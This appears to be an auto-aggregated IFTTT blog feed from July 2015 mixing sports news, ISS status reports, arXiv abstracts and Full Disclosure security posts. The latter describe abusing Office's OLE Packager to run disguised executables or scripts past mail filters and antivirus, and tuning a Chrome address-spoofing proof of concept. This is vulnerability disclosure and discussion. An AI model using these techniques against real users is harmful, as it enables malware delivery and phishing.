NASHVILLE, Tenn. (AP) Goalkeeper Brad Guzan is intent on following up a disappointing spring with a sizzling summer, giving the United States reason for optimism as it heads into the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1LGTzu8
via IFTTT

I have a new follower on Twitter


rocio
Senora no le parece:que ya es demasiadoygrande como para sacar a pasear a su muneca.


Following: 808 - Followers: 47

July 02, 2015 at 05:02PM via Twitter http://twitter.com/biebsrocio798

Copa America huge chance for Chile to finally win big title

SANTIAGO, Chile (AP) It feels like it's now or never for Chile.

from FOX Sports Digital http://ift.tt/1HzgqpV
via IFTTT

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

[FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

All, OLE Packager is a feature introduced in Windows 3.1, which ran "up to" Windows XP: http://ift.tt/1HyfuUy It is still present in every version of Microsoft Office, on every Windows OS. It allows you to embed any file into Office documents. It is also very dangerous and there is no way to disable it. To test, open Word 2010/2013 and select Insert -> Object -> Create from File, and drop an executable into the document. Double clicking the executable then spawns the executable. You can also right click the file name, to change the name and use a custom icon. You can use the Draw functions to draw a white box over the file extension. This isn't new (although I think most people aren't aware this function is still active). There's all sorts of problems, though: - You can bypass many mail gateways and antivirus products by simply saving the document as an .RTF file - these also support OLE Packager objects. Most products I've tested fail to scan for Packager objects inside RTF files, which are in turn then opened in Word by default. - A dll file called packager.dll is used to determine if the file extension can execute code via a static list, and displays a warning for the user to click through. There is no way to disable the Packager functionality, so every Enterprise/Gov/Org/user has this functionality enabled right now. - The DLL file hasn't been kept up to date. For example, you can use .PS1 (PowerShell) embeds without any security warning. There's a lot of file types now you can execute code with without warning, basically. - You can also embed executable code within ZIP files, to completely bypass the warning. - The files are executed from your %appdata% folder, which is trusted for things such as Windows Scripting Host. So for example, you can use malicious .js files to execute full code, wrapped in a ZIP, with absolutely no warning to the user nor ability to disable the functionality, even with Group Policy/high security Office templates etc. I've tried this technique with most of the large cloud based email filtering companies and it just sails past them. I've also tried two anti-exploit products (Malwarebytes Anti-Exploit and a company I won't name due to NDA) and it doesn't trigger their protection. No antivirus product detected anything suspect during testing. I notified Microsoft of my research back in March, but from the dialogue I've had it's a supported feature dating back to the early 90s. It also appears to be supported going forward. I think it blows apart security models and basically provides an easy way to detonate code on PCs far behind firewalls - my belief is organisations should be able to disable this feature, and it should probably be disabled by default in future Office versions. As a mitigation, you can install Microsoft EMET and manually add packager.dll to ASR. --Kevin

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-3442 Authentication Bypass in Xpert.Line Version 3.0

############################################################# # # COMPASS SECURITY ADVISORY # http://ift.tt/JChVZk # ############################################################# # # Product: Xpert.Line # Vendor: Soreco AG [1] # CVE ID: CVE-2015-3442 # Subject: Authentication Bypass # Risk: Critical # Effect: Remotely exploitable # Author: Alessandro Zala (alessandro.zala@csnc.ch) # Andreas Hunkeler (andreas.hunkeler@csnc.ch) # Date: 06.03.2015 # ############################################################# Introduction:

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Sendfiles2.me
Sendfiles2.me makes getting files from others easier. Tweets by @malibey
localhost
http://t.co/lKQoKuNoRp
Following: 4567 - Followers: 5984

July 02, 2015 at 01:14PM via Twitter http://twitter.com/sendfiles2me

AC Milan signs striker Carlos Bacca from Sevilla

SEVILLE, Spain (AP) AC Milan has acquired Colombia striker Carlos Bacca on a transfer from Spanish club Sevilla.

from FOX Sports Digital http://ift.tt/1f5BKsm
via IFTTT

Turmoil in Russian football as government limits foreigners

MOSCOW (AP) With just 10 days until the start of the new season, Russian football clubs' transfer plans risk being upended as the government threatens to cut the number of foreign players they can field.

from FOX Sports Digital http://ift.tt/1FV9ZI6
via IFTTT

via IFTTT

via IFTTT

UEFA confirms Rubin Kazan to get Europa League place

MOSCOW (AP) UEFA has confirmed that Rubin Kazan will replace fellow Russian club Dynamo Moscow in the Europa League after the latter broke financial fair play rules.

from FOX Sports Digital http://ift.tt/1NzaXAd
via IFTTT

ISS Daily Summary Report – 07/01/15

ISSpresso: Kelly performed troubleshooting on the ISSpresso.  He was instructed to remove a deformed capsule lodged in the chamber and proceed with a nominal brewing.  The ISSpresso machine is a technical demonstration experiment that has the capability to provide hot beverages including espresso and still maintain the crema when dispensed in space. Capillary Effects of Drinking in the Microgravity Environment (Capillary Beverage): Microgravity affects the way fluids behave, and as such, crew members must drink from special sealed bags instead of using straws or normal cups. Capillary Beverage studies the process of drinking from specially designed Space Cups that use fluid dynamics to mimic the effect of gravity. In this instance of Capillary Beverage, Kelly used Black Kona Coffee to demonstrate how a complex fluid reacts to the cup’s special designs in an attempt to mimic the gravitational flow of a liquid through capillary forces. High definition video was used to capture the data and will be analyzed on the ground. Journals: Kelly authored a Journal entry today in support of the Behavioral Issues Associated with Isolation and Confinement: Review and Analysis of Astronaut Journals experiment.  Journals provides information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. Study results provide information to help prepare for future missions to low-Earth orbit and beyond. Habitability: Kelly is scheduled to use the iShort tablet application to capture observations regarding the habitability onboard the ISS. Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations such as Near Earth Asteroids (NEA) and Mars. The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Observations during the 1-year mission, as well as 6-month missions, can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. The iShort application will enable ground support teams and human factor engineers to study and evaluate the design of the ISS and use these results for future spacecraft. Rodent Research Inventory: Kelly continued his review of on-orbit consumables and hardware required for Rodent Research operations.  The information gathered during this inventory is being used to determine what cargo is required for future manifests to support Rodent Research.  Following the loss of SpaceX-7, upmass availability is at a premium and this data point will provide ground teams with the knowledge of what is required to fly to the ISS while minimizing duplication. Acoustic Dosimeter Operations: Kelly set up the Acoustic Dosimeter to take sound measurements on the ISS. For crew-worn sessions the dosimeter was donned directly after crew wake and will be worn for 24 hours after which measurements will be recorded. For static deploy sessions, dosimeters will be deployed in the Node 3 and Cupola for approximately 24 hours. Japanese Experiment Module Remote Manipulator System (JEMRMS) Console Checkout: Kelly completed  a checkout of the JEMRMS Console.  During the checkout the Camera Control Panel (CCP), Remote Interface Panel (RIP), RMS monitor and hand controllers were activated. This activity is in preparation for HTV5 operations planned in August. Today’s Planned Activities All activities were completed unless otherwise noted. Inspecting RS Structural Elements Shell Surfaces using МВП-2К device. / r/g 9204, 9218 Audio Dosimeter Preparation JEMRMS – Final Activation before JEMRMS console checkout ISSpresso Brewing VIZIR. Battery charge preparation and initiation / r/g 9217 JEMRMS – Console checkout JEMRMS – Deactivation preparation after JEMRMS checkout Capillary Beverage MWA Preparation Capillary Beverage P/L Deployment SM Ventilation System Preventive Maintenance r/g 8393 Capillary Beverage Test Operations Data prep on monitoring RSOS structural surfaces for downlink / r/g 9204 UDOD. Experiment ops using DYKNANIYE-1 and SPRUT-2 sets. / r/g 9210 Capillary Beverage Stowage Journal – Survey Completion Habitability And Human Factors.  Observations Subject. Node 2 Nadir hatch reconfig to nominal, fully latched configuration LAB and Cupola Display and Control Panel (DCP) Powerdown Audit Life Science Hardware stowed in the COL AFT locations. VIZIR. Battery Charge / r/g 9217 IMS Delta File Prep ABOUT GAGARIN FROM SPACE. HAM Radio Session / r/g 9211 Stow Earlier Installed Formaldehyde Monitoring Kit (FMK) VZAIMODEISTVIYE-2. Experiment Ops / r/g 9213 Vacuum Pressure Gauge Accuracy Check / r/g 9212 WRS – Recycle Tank Fill VIZIR. Battery Charge  Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. METEON commanding JEMRMS ops OASIS video Three-Day Look Ahead: Thursday, 07/02: Multi-user Droplet Combustion Apparatus MWA Prep, CIR Hardware Review/hardware gather, HRF2 Supply Kit Resupply, Reconnection of MagVector Umbilicals to COL1F2 UIP Friday, 07/03: JEMRMS BDS Reconfig/checkout, Acoustic Dosimeters data transfer/stow, BCAT Intervalometer Change, MDCA h/w replace, 60P Launch (184/04:55 GMT, 7/2 23:55 CDT) Saturday, 07/04: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1H3ijcX
via IFTTT

Homes of Dinamo Zagreb bosses raided by Croatian police

ZAGREB, Croatia (AP) Croatian police have raided the homes and offices of the Dinamo Zagreb bosses who are suspected of tax evasion and bribery.

from FOX Sports Digital http://ift.tt/1IR434X
via IFTTT

How to Anonymously Access Wi-Fi from 2.5 Miles Away Using This Incredible Device

Anonymity is something that seems next to impossible in this era of government surveillance. Even Tor and VPNs are no longer seem to be enough to protect user privacy. Once your IP address is discovered, your Game Over! However, a method have been devised that not only allow users to anonymously connect to public Wi-Fi network, but also let them connect from about 2.5 Miles away.


from The Hacker News http://ift.tt/1LFshEs
via IFTTT

China's Evergrande Taobao team applies for stock listing

HONG KONG (AP) Chinese soccer team Guangzhou Evergrande Taobao, owned by e-commerce giant Alibaba and one of the country's biggest property developers, has applied for a listing on a Chinese stock market.

from FOX Sports Digital http://ift.tt/1HziEHC
via IFTTT

Hand grenade found at Red Star stadium

BELGRADE, Serbia (AP) Serbian Police say they have found an unexploded hand grenade at the Red Star stadium in Belgrade ahead of a Europa League qualifier match.

from FOX Sports Digital http://ift.tt/1R6Z6yQ
via IFTTT

These Laser Beams Will Offer Free Internet to the World from the Sky

During a wide-ranging online question-and-answer session on his Facebook page Tuesday, Facebook co-founder Mark Zuckerberg predicted some wild things for Future. It includes: Telepathy Technology, the ability for humans to talk to each other with their minds. Laser Beams, used to transmit data from the sky to Earth. Growth of Artificial Intelligence and Virtual Reality. Today, Mark


from The Hacker News http://ift.tt/1UbuoUe
via IFTTT

US files formal extradition request for 7 FIFA officials

ZURICH (AP) The United States has submitted a formal request for Switzerland to extradite seven FIFA officials arrested as part of a corruption probe in Zurich in May, Swiss officials said Thursday.

from FOX Sports Digital http://ift.tt/1FTZe8N
via IFTTT

Apple Releases dozens of Security Updates to Fix OS X and iOS Flaws

Apple has released updates to patch dozens of security vulnerabilities in iOS and OS X Yosemite operating system. The updates include iOS 8.4 version of the mobile operating system, OS X Yosemite 10.10.4 and Security Update 2015-005. iOS 8.4 Update The iOS 8.4 update includes patches for over 20 security vulnerabilities that could lead to remote code execution (RCE), application


from The Hacker News http://ift.tt/1GPFnJU
via IFTTT

Switzerland: US seeks extradition of 7 FIFA officials

BERLIN (AP) Swiss justice officials say they have received a formal request from the United States to extradite seven FIFA officials arrested in Zurich in May.

from FOX Sports Digital http://ift.tt/1LF5msX
via IFTTT

I have a new follower on Twitter


Dragon
Miss you bro. Rip FHS 76-10
Houston, Tx

Following: 1824 - Followers: 495

July 02, 2015 at 02:09AM via Twitter http://twitter.com/mhsantiesteban

I have a new follower on Twitter


Laurel Robbins
Inspired by nature, fuelled by curiosity, on a mission to get people outdoors. Adventure travel blogger at http://t.co/cSETsmEVMp. Co-founder of #AdvTravelChat
Munich, Germany
http://t.co/cSETsmWwDX
Following: 36452 - Followers: 62811

July 02, 2015 at 02:09AM via Twitter http://twitter.com/Laurel_Robbins

Venus, Jupiter, and Noctilucent Clouds


Have you seen the passing planets yet? Today the planets Jupiter and Venus pass within half a degree of each other as seen from Earth. This conjunction, visible all over the world, is quite easy to see -- just look to the west shortly after sunset. The brightest objects visible above the horizon will be Venus and Jupiter, with Venus being the brighter of the two. Featured above, the closing planets were captured two nights ago in a sunset sky graced also by high-level noctilucent clouds. In the foreground, the astrophotographer's sister takes in the vista from a bank of the Sec Reservoir in the Czech Republic. She reported this as the first time she has seen noctilucent clouds. Jupiter and Venus will appear even closer together tonight and will continue to be visible in the same part of the sky until mid-August. via NASA http://ift.tt/1IrMOeT

Chicharito injures collarbone as Mexico ties Honduras

HOUSTON (AP) Mexico's Gold Cup chances could take a hit after Tuesday's tune-up game with Honduras. Star forward Javier `'Chicharito'' Hernandez left the scoreless draw with a collarbone injury.

from FOX Sports Digital http://ift.tt/1NyjOBo
via IFTTT

Wednesday, July 1, 2015

Chicharito injures collarbone as Mexico ties Honduras

HOUSTON (AP) Mexico forward Javier `Chicharito' Hernandez left a scoreless draw against Honduras on Wednesday night with a collarbone injury as the teams put the final touches on their Gold Cup preparations.

from FOX Sports Digital http://ift.tt/1dzl6zQ
via IFTTT

Boca Juniors beat Strikers 3-0

FORT LAUDERDALE (AP) Jonathan Calleri and Alexis Rolin scored early in each half to lead Argentina's Boca Juniors to a 3-0 victory over the Fort Lauderdale Strikers on Wednesday night.

from FOX Sports Digital http://ift.tt/1IutLQQ
via IFTTT

Orioles Highlight: JJ Hardy hits go-ahead home run and Wei-Yin Chen holds Rangers to 2 ER over 8 IP in 4-2 win (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

> We reported this to Google. > They reproduced, and say > It's DoS which doesn't matter. > We think it's very strange, > since the browser does not crash(not DoS), I think they called it DOS because the chrome.exe process starts to consume system memory out of control. In my example (Win7 Chrome 43.0.2357.130) it ended up consuming 4GB+ of memory before it finally gave up 3 minutes or so later and issued an error message in both windows. Potentially, with multiple such frames being launched one could make it crash. That's beside the point though as the URL spoofing is clearly there. --Mike

Source: Gmail -> IFTTT-> Blogger

[FD] iTunes 12.2 and QuickTime 7.7.7 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files\...

[FD] Exploit Code for ipTIME firmwares < 9.58 (root RCE against 127 router models)

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

http://ift.tt/1Nvh080 Big Whale said: "Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works" "clearly URL spoofing" Thanks for testing! http://ift.tt/1GYsXS0 0pc0deFR said: "Work on Google Chrome Ubuntu" Bonjour, thanks for testing! http://ift.tt/1T18S30 Daniel Micay said: "It does display a window with the oracle.com address" "why you've got an ever increasing number of setTimeout events" http://ift.tt/1C43XKn Alexander E. Patrakov said: "Looks like a fork bomb" Thanks for testing! The number of "setTimeout" does NOT need to be increasing forever. OK, I admit - we are lazy(it works and we don't touch it anymore) :-) http://ift.tt/1R3EqYq Roney Gomes said: "it worked on the desktop version of Opera" Wow! Thanks for letting us know. Here is the screenshot of Opera http://ift.tt/1LVTVLp And Chrome http://ift.tt/1IuiaRS (A number is displayed in Chrome's address bar, not the same as Opera) http://ift.tt/1GWNdDM Daniel Micay said: "it can't always be replicated" "I've tried it a few times and" "it fails about as often as it works" http://ift.tt/1R3EozR Valentinas Bakaitis said: "PoC did not work" Hey! The trick here is timing: Please modify those numbers in code - make them smaller. http://ift.tt/1BXeEhG Zak Siddiqui said: "Is it reproducible with HTTPS?" Yes, we just tried this URL http://ift.tt/16kwqqf It works. In fact, it works BETTER against HTTPS, because HTTPS is slower, so timing is easier. http://ift.tt/1T18PEb Florian Weimer said: "they show the new URL while still displaying old content" Exactly, that's the cause of this bug. In the end, allow me to repeat: No user interaction on the fake page. But, anyone can do "BBB Accredited Business" "PayPal Partner" etc. Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ On 2015/6/30 7:08, David Leo wrote: > Impact: > The "click to verify" thing is completely broken... > Anyone can be "BBB Accredited Business" etc. > You can make whitehouse.gov display "We love Islamic State" :-) > > Note: > No user interaction on the fake page. > > Code: > ***** index.html > > Go
> ***** content.html > This web page is NOT oracle.com > > ***** It's online > http://ift.tt/1R2ihK7 > (The page says "June/16/2015" - it works as we tested today) > > Request For Comment: > We reported this to Google. > They reproduced, and say > It's DoS which doesn't matter. > We think it's very strange, > since the browser does not crash(not DoS), > and the threat is obvious. > What's your opinion? > > Kind Regards, > > PS > We love clever tricks. > We love this: > http://dieyu.org/

Source: Gmail -> IFTTT-> Blogger

Top-N recommendations in the presence of sparsity: An NCD-based approach. (arXiv:1507.00043v1 [cs.IR])

Making recommendations in the presence of sparsity is known to present one of the most challenging problems faced by collaborative filtering methods. In this work we tackle this problem by exploiting the innately hierarchical structure of the item space following an approach inspired by the theory of Decomposability. We view the itemspace as a Nearly Decomposable system and we define blocks of closely related elements and corresponding indirect proximity components. We study the theoretical properties of the decomposition and we derive sufficient conditions that guarantee full item space coverage even in cold-start recommendation scenarios. A comprehensive set of experiments on the MovieLens and the Yahoo!R2Music datasets, using several widely applied performance metrics, support our model's theoretically predicted properties and verify that NCDREC outperforms several state-of-the-art algorithms, in terms of recommendation accuracy, diversity and sparseness insensitivity.



from cs.AI updates on arXiv.org http://ift.tt/1NxYv2Q
via IFTTT

Fast Cross-Validation for Incremental Learning. (arXiv:1507.00066v1 [stat.ML])

Cross-validation (CV) is one of the main tools for performance estimation and parameter tuning in machine learning. The general recipe for computing CV estimate is to run a learning algorithm separately for each CV fold, a computationally expensive process. In this paper, we propose a new approach to reduce the computational burden of CV-based performance estimation. As opposed to all previous attempts, which are specific to a particular learning model or problem domain, we propose a general method applicable to a large class of incremental learning algorithms, which are uniquely fitted to big data problems. In particular, our method applies to a wide range of supervised and unsupervised learning tasks with different performance criteria, as long as the base learning algorithm is incremental. We show that the running time of the algorithm scales logarithmically, rather than linearly, in the number of CV folds. Furthermore, the algorithm has favorable properties for parallel and distributed implementation. Experiments with state-of-the-art incremental learning algorithms confirm the practicality of the proposed method.



from cs.AI updates on arXiv.org http://ift.tt/1NxYv2O
via IFTTT

A Tool for Computing and Estimating the Volume of the Solution Space of SMT(LA). (arXiv:1507.00142v1 [cs.AI])

There are already quite a few tools for solving the Satisfiability Modulo Theories (SMT) problems. In this paper, we present \texttt{VolCE}, a tool for counting the solutions of SMT constraints, or in other words, for computing the volume of the solution space. Its input is essentially a set of Boolean combinations of linear constraints, where the numeric variables are either all integers or all reals, and each variable is bounded. The tool extends SMT solving with integer solution counting and volume computation/estimation for convex polytopes. Effective heuristics are adopted, which enable the tool to deal with high-dimensional problem instances efficiently and accurately.



from cs.AI updates on arXiv.org http://ift.tt/1Nx7VMP
via IFTTT

From Causes for Database Queries to Repairs and Model-Based Diagnosis and Back. (arXiv:1507.00257v1 [cs.DB])

In this work we establish and investigate connections between causes for query answers in databases, database repairs wrt. denial constraints, and consistency-based diagnosis. The first two are relatively new research areas in databases, and the third one is an established subject in knowledge representation. We show how to obtain database repairs from causes, and the other way around. Causality problems are formulated as diagnosis problems, and the diagnoses provide causes and their responsibilities. The vast body of research on database repairs can be applied to the newer problems of computing actual causes for query answers and their responsibilities. These connections, which are interesting per se, allow us, after a transition -inspired by consistency-based diagnosis- to computational problems on hitting sets and vertex covers in hypergraphs, to obtain several new algorithmic and complexity results for database causality.



from cs.AI updates on arXiv.org http://ift.tt/1IPiF4P
via IFTTT

Online Learning under Delayed Feedback. (arXiv:1306.0686v2 [cs.LG] CROSS LISTED)

Online learning with delayed feedback has received increasing attention recently due to its several applications in distributed, web-based learning problems. In this paper we provide a systematic study of the topic, and analyze the effect of delay on the regret of online learning algorithms. Somewhat surprisingly, it turns out that delay increases the regret in a multiplicative way in adversarial problems, and in an additive way in stochastic problems. We give meta-algorithms that transform, in a black-box fashion, algorithms developed for the non-delayed case into ones that can handle the presence of delays in the feedback loop. Modifications of the well-known UCB algorithm are also developed for the bandit problem with delayed feedback, with the advantage over the meta-algorithms that they can be implemented with lower complexity.



from cs.AI updates on arXiv.org http://ift.tt/1Jyh8pt
via IFTTT

Toward the Coevolution of Novel Vertical-Axis Wind Turbines. (arXiv:1308.3136v2 [cs.NE] CROSS LISTED)

The production of renewable and sustainable energy is one of the most important challenges currently facing mankind. Wind has made an increasing contribution to the world's energy supply mix, but still remains a long way from reaching its full potential. In this paper, we investigate the use of artificial evolution to design vertical-axis wind turbine prototypes that are physically instantiated and evaluated under fan generated wind conditions. Initially a conventional evolutionary algorithm is used to explore the design space of a single wind turbine and later a cooperative coevolutionary algorithm is used to explore the design space of an array of wind turbines. Artificial neural networks are used throughout as surrogate models to assist learning and found to reduce the number of fabrications required to reach a higher aerodynamic efficiency. Unlike in other approaches, such as computational fluid dynamics simulations, no mathematical formulations are used and no model assumptions are made.



from cs.AI updates on arXiv.org http://ift.tt/1JyhZGO
via IFTTT

Design Mining Interacting Wind Turbines. (arXiv:1410.0547v2 [cs.NE] CROSS LISTED)

An initial study of surrogate-assisted evolutionary algorithms used to design vertical-axis wind turbines wherein candidate prototypes are evaluated under fan generated wind conditions after being physically instantiated by a 3D printer has recently been presented. Unlike other approaches, such as computational fluid dynamics simulations, no mathematical formulations were used and no model assumptions were made. This paper extends that work by exploring alternative surrogate modelling and evolutionary techniques. The accuracy of various modelling algorithms used to estimate the fitness of evaluated individuals from the initial experiments is compared. The effect of temporally windowing surrogate model training samples is explored. A surrogate-assisted approach based on an enhanced local search is introduced; and alternative coevolution collaboration schemes are examined.



from cs.AI updates on arXiv.org http://ift.tt/1Nx7To2
via IFTTT

Design Mining VAWT Wind Farms. (arXiv:1506.08781v1 [cs.NE] CROSS LISTED)

The small body of previous work considering the design of wind farms has used arrays of turbines originally intended to operate alone, optimising the layout of homogeneous turbines essentially as an afterthought in the design process. In this paper, we consider designing wind farms composed of collaborating wind turbines. Computational intelligence is combined with rapid prototyping whereby candidate designs are physically instantiated and evaluated under fan-generated wind conditions. It is shown possible to use surrogate-assisted coevolutionary algorithms to aerodynamically optimise the potentially heterogeneous morphology of an array of 6 small scale and closely positioned vertical-axis wind turbines using the total angular kinetic energy of the array as the objective. This approach performs optimisation in the presence of complex inter-turbine wake effects and multi-directional wind flow from nearby obstacles, which is extremely difficult to achieve accurately under high fidelity computational fluid dynamics simulation. The general approach is equally applicable to the design of other forms of sustainable energy where the characteristics of the environment and/or materials involved are too difficult to accurately simulate.



from cs.AI updates on arXiv.org http://ift.tt/1Nx7TnZ
via IFTTT

Blatter says he has 'clear conscience' despite FIFA probes

BERLIN (AP) FIFA President Sepp Blatter says he is not corrupt and that he has a ''clear conscience'' despite corruption investigations into world soccer's governing body.

from FOX Sports Digital http://ift.tt/1R5O6Se
via IFTTT

Orioles: OF Delmon Young designated for assignment; batting .270 with 2 HRs, 16 RBIs in 52 games this season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Gundogan extends Borussia Dortmund contract by 1 year

DORTMUND, Germany (AP) Germany midfielder Ilkay Gundogan has extended his contract at Borussia Dortmund, ending speculation he will leave the club this summer.

from FOX Sports Digital http://ift.tt/1KtAGvt
via IFTTT

Brazil to ask former coaches to help improve local football

SAO PAULO (AP) The Brazilian football confederation says it will summon former national team coaches to help find ways of improving football in the country after a series of disappointing results.

from FOX Sports Digital http://ift.tt/1R5kLaA
via IFTTT

Ask an Anonymous Cop: Do You Write More Tickets at the End of the Month?

In the latest installment of Gawker's mailbag Q&A with an anonymous cop—he spent five years with the NYPD and now works as a reserve officer in ...

from Google Alert - anonymous http://ift.tt/1Nw8x5j
via IFTTT

Dutch FA appoints Danny Blind as national coach

THE HAGUE, Netherlands (AP) The Dutch football association has appointed Danny Blind as the Netherlands' national coach, replacing Guus Hiddink, whose contract was terminated Monday.

from FOX Sports Digital http://ift.tt/1U8poQ2
via IFTTT

Messi & Argentina shining together, closer to elusive title

CONCEPCION, Chile (AP) Lionel Messi is a step closer to finally breaking through with Argentina.

from FOX Sports Digital http://ift.tt/1NvRBM7
via IFTTT

Spanish club Rayo to support charities with jersey sales

MADRID (AP) Spanish football club Rayo Vallecano says it will donate to charitable causes such as ones fighting cancer and sexual discrimination for each of its away jerseys sold this season.

from FOX Sports Digital http://ift.tt/1KrksRO
via IFTTT

Anonymous on Twitter: "Shout outs to the people mimicking my work. http://ift.tt/1HuCqlG;

Anonymous retweeted Agent 301 ... Anonymous added, ... thought you were a collective. kinda hard to look for glory while being literally anonymous.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/616041572962971648&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNHN_aa7XoSDzzC98k5zmVchM8qnZg
via IFTTT

Clyne, Osvaldo leave Southampton as transfer window opens

LONDON (AP) Southampton sold Nathaniel Clyne to Liverpool and ended Dani Osvaldo's expensive stay at the club on the opening day of Europe's summer transfer window in the English Premier League.

from FOX Sports Digital http://ift.tt/1BYmbfW
via IFTTT

These Are The FBI's Most Wanted Hackers — Total $4.2 Million Reward

The US State Department and the Federal Bureau of Investigation are willing to pay a total $4.2 Million for information leading to the arrest and/or conviction of top 5 most wanted cyber criminals accused of conducting frauds of hundreds of millions of dollars. Evgeniy Bogachev,30; Nicolae Popescu, 34; Alexsey Belan, 28; Peteris Sahurovs, 26; and Shailesh Kumar Jain, 45; are in the list of


from The Hacker News http://ift.tt/1Huq3G4
via IFTTT

Argentina routs Paraguay 6-1, reaches Copa America final

CONCEPCION, Chile (AP) Lionel Messi helped set up five goals as Argentina trounced Paraguay 6-1 in the Copa America semifinals on Tuesday, setting up a final against host Chile.

from FOX Sports Digital http://ift.tt/1U7Q6s7
via IFTTT

ISS Daily Summary Report – 06/30/15

Plant Gravity Sensing-2 (PGS-2) Photon Counting Unit (PCU) Checkout: Kelly attached PCUs to the CBEF Incubator Unit (IU) 1-Gravity (1-G) centrifuge.  Japan Aerospace Exploration Agency (JAXA) ground controllers downlinked data from the Plant Experiment Unit (PEU) through the Image Processing Unit (IPU) and reviewed data from the installed PCU.  The first run of PGS-2 is planned for July 8.  Plants growing on Earth can detect gravity, which enables them to grow their stalks in the opposite direction as their roots. But scientists do not yet understand the chemical process controlling plants response to gravity. Concentrations of calcium in plant cells change in response to various factors, including temperature and touch, and changes in the direction of gravity when plants grown under 1g condition on the earth, but scientists are not sure whether gravity also affects calcium levels in plants grown in microgravity conditions. Utilization of the micro gravity condition to examine the cellular process of formation of the gravity sensor and the molecular mechanism of gravity sensing (Plant Gravity Sensing) studies whether plants grown in microgravity conditions can sense the changes in the gravitational acceleration, and the concentrations of calcium in plant cells changes. Binary Colloidal Alloy Test – Low Gravity Phase Kinetics Platform (BCAT-KP) Sample Initiation: Kelly set up the sample image, homogenized a sample, took manual photos using EarthKam software, and initiated automated photography utilizing the camera intervalometer. This sample is the tenth and final sample for BCAT-KP. BCAT-KP provides a platform for material and industrial scientists to investigate colloid phase changes, providing results that may be used to develop new colloidal materials and formulations with unique properties. The results may support new applications, from new liquid crystals to consumer goods having longer shelf life and uses. Rodent Research (RR) Inventory and Audit: Kelly audited remaining RR equipment and supplies and consolidated equipment. The number of remaining supplies will provide information for manifesting for future RR experiments.  Human Research Facility Personal Computer-2 (HRF PC-2) Troubleshooting: In late April, HRF PC2 failed to respond to ground commands.  The power supply brick was changed following several instances of circuit breaker trips. Commanding capability was recovered for one activation, however, subsequent activations were not successful via ground commanding.  Today Kelly performed troubleshooting to address the “no Ethernet cable connected” notification.  Troubleshooting steps were successful and the HRF PC2 was returned to working order. Today’s Planned Activities   All activities were completed unless otherwise noted. Plant Gravity Sensing 2 (PGS2) Experiment Photon Counting Unit Check Out Preparation JEM Terminal Computer Reboot Inspecting RS Structural Elements Shell Surfaces using МВП-2К device. Counter Measure System (CMS) Harmful Contaminant Measurements in SM Audio Dosimeter Preparation ISS RS Atmosphere Analysis Using АОК ГАНК-4М [Aborted] OBT ISS Crew Medical Officer (CMO) Computer Based Training (CBT) Plant Gravity Sensing-2 Experiment Photon Counting Unit Check Out Rodent Research Inventory Audit and Disposal of Some Items FGB 800А (А71) Unit Replacement Starting Photography of Binary Colloidal Alloy Test Sample (BCAT) TORU OBT. Tagup with Instructor PGS2 Closeout Ops WRS – Recycle Tank Fill from EDV HRF2 PC2 Troubleshooting Rodent Research Inventory Audit and Disposal of Some Items OTKLIK. Hardware Check СОЖ Maintenance IMS Delta File Prep COSMOCARD. Closeout Ops.  Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. METERON laptop command POIC weekly system maintenance Three-Day Look Ahead: Wednesday, 07/01: EHS acoustic dosimeter setup, JEMRMS activation/checkout Thursday, 07/02: Multi-user Droplet Combustion Apparatus MWA Prep, CIR Hardware Review/hardware gather, HRF2 Supply Kit Resupply, Reconnection of MagVector Umbilicals to COL1F2 UIP Friday, 07/03: JEMRMS BDS Reconfig/checkout, Acoustic Dosimeters data transfer/stow, BCAT Intervalometer Change, MDCA h/w replace QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1LUDK0W
via IFTTT

Ex-coach Scala leads group attempting to revive Parma

PARMA, Italy (AP) Former coach Nevio Scala is leading a group of investors applying to revive bankrupt club Parma in the fourth division.

from FOX Sports Digital http://ift.tt/1T5oIJU
via IFTTT

